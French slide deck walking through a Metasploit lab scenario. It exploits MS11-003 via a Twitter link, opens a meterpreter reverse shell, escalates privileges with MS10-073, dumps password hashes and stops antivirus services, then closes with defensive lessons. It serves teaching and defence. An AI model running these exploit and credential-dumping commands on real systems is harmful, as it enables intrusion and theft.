1. Scénarios Metasploit
Scénario 2
Http://labs.zataz.com - Http://twitter.com/eromang

2. Scénario 2 : Topologie
Target Firewall Attacker
Gateway
192.168.111.0/24 192.168.178.0/24
Target (Cible) :
- Windows XP SP3 - L’utilisateur « test » a un compte limité en privilèges
- IP : 192.168.111.129 - Passerelle par défaut : 192.168.111.128
- Anti-virus : Ad-Aware Free / Windows Defender
- Firewall Windows activé
- Vulnérable à MS11-003 & MS10-073
Firewall Gateway :
- Eth0 : 192.168.111.128 (interface interne)
- Eth1 : 192.168.178.59 (interface externe)
Attacker (attaquant) :
- IP : 192.168.178.21

3. Scénario 2 : Règles Firewall
• L’administration du Firewall s’effectue par SSH depuis le réseau interne
• Le réseau interne peut effectuer des requêtes « Any » vers le réseau externe

4. Scénario 2 : Story-Board
✤ Cette topologie réseau correspond à la plupart des réseaux ADSL d’internautes et aussi à la configuration réseau
classique de petites et moyennes entreprises.
✤ La cible à trois contre-mesure activées : Comme vous allez le voir aucune ne réagit !
✤ Anti-virus Ad-Aware Free mis à jour avec une configuration par défaut.
✤ Anti-spyware Windows Defender mis à jour avec une configuration par défaut.
✤ Firewall Windows avec une configuration par défaut.
✤ La cible est vulnérable à la vulnérabilité Internet Explorer MS11-003 et à la vulnérabilité MS10-073 Keyboard Layout
✤ MS11-003 sera le point d’entré
✤ MS10-073 permettra l’escalade de privilèges (Stuxnet)

5. Scénario 2 : Story-Board
✤ L’attaquant envoi un message Twitter à sa cible. Le message contient un lien malveillant dirigeant vers un site
permettant d’exploiter la vulnérabilité Internet Explorer MS11-003.
✤ La cible clique sur le lien Twitter, et la vulnérabilité MS11-003 est exploitée. Après cette exploitation un «payload»
meterpreter reverse_tcp est initié à destination de l’attaquant sur le port 4444/TCP.
✤ L’attaquant va vérifier toutes les contre-mesures installées sur sa cible, tenter des les désactivées, sans succès, car il
n’a pas les privilèges nécessaires.
✤ L’attaquant doit vérifier si les patchs suivant sont installés, afin de pouvoir lancé l’attaque du type «escalade de
privilèges» MS10-073.
✤ MS11-012 (KB2479628) / MS10-098 (KB2436673) / MS10-073 (KB981957)
✤ Si un de ces patchs est installé, l’escalade de privilèges par le biais de MS10-073 sera impossible. winenum est la
solution pour récupérer la liste des patchs installés.
✤ L’attaquant va exécuter l’escalade de privilèges MS10-073.

6. Scénario 2 : Commandes
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
migrate X -> vers un autre processus
kill X -> 2 fois -> notepad.exe & le processus iexplorer.exe
run getcountermeasure
run getcountermeasure -k
getuid
shell
echo %USERNAME%
getprivs
getsystem
hashdump
sysinfo
ipconfig
route
background

7. Scénario 2 : Commandes
use post/windows/escalate/ms10_073_kbdlayout
set SESSION 1
run
sessions -i 1
getuid
migrate X -> vers un processus «NT AUTHORITYSYSTEM»
shell
echo %USERNAME%
net start
net stop "Lavasoft Ad-Aware Service"
net stop "Windows Defender"
net start
ps

8. Scénario 2 : Leçons apprises
•Mettre à jour son OS et ses applicatifs !
•Ne jamais cliquer sur des liens, surtout raccourcis, provenant de sources inconnues !
•Ne pas faire confiance à son anti-virus !
•Sélectionner un anti-virus qui est capable de détecter des attaques basiques !
•Ne pas faire confiance à ses Firewalls (Locaux ou distants) !
•Ne pas autoriser des connexions sortantes du type «Any» depuis votre réseau interne
vers des réseaux qui ne sont pas de confiance ! Limiter les connexions sortantes à vos
véritables besoins.
8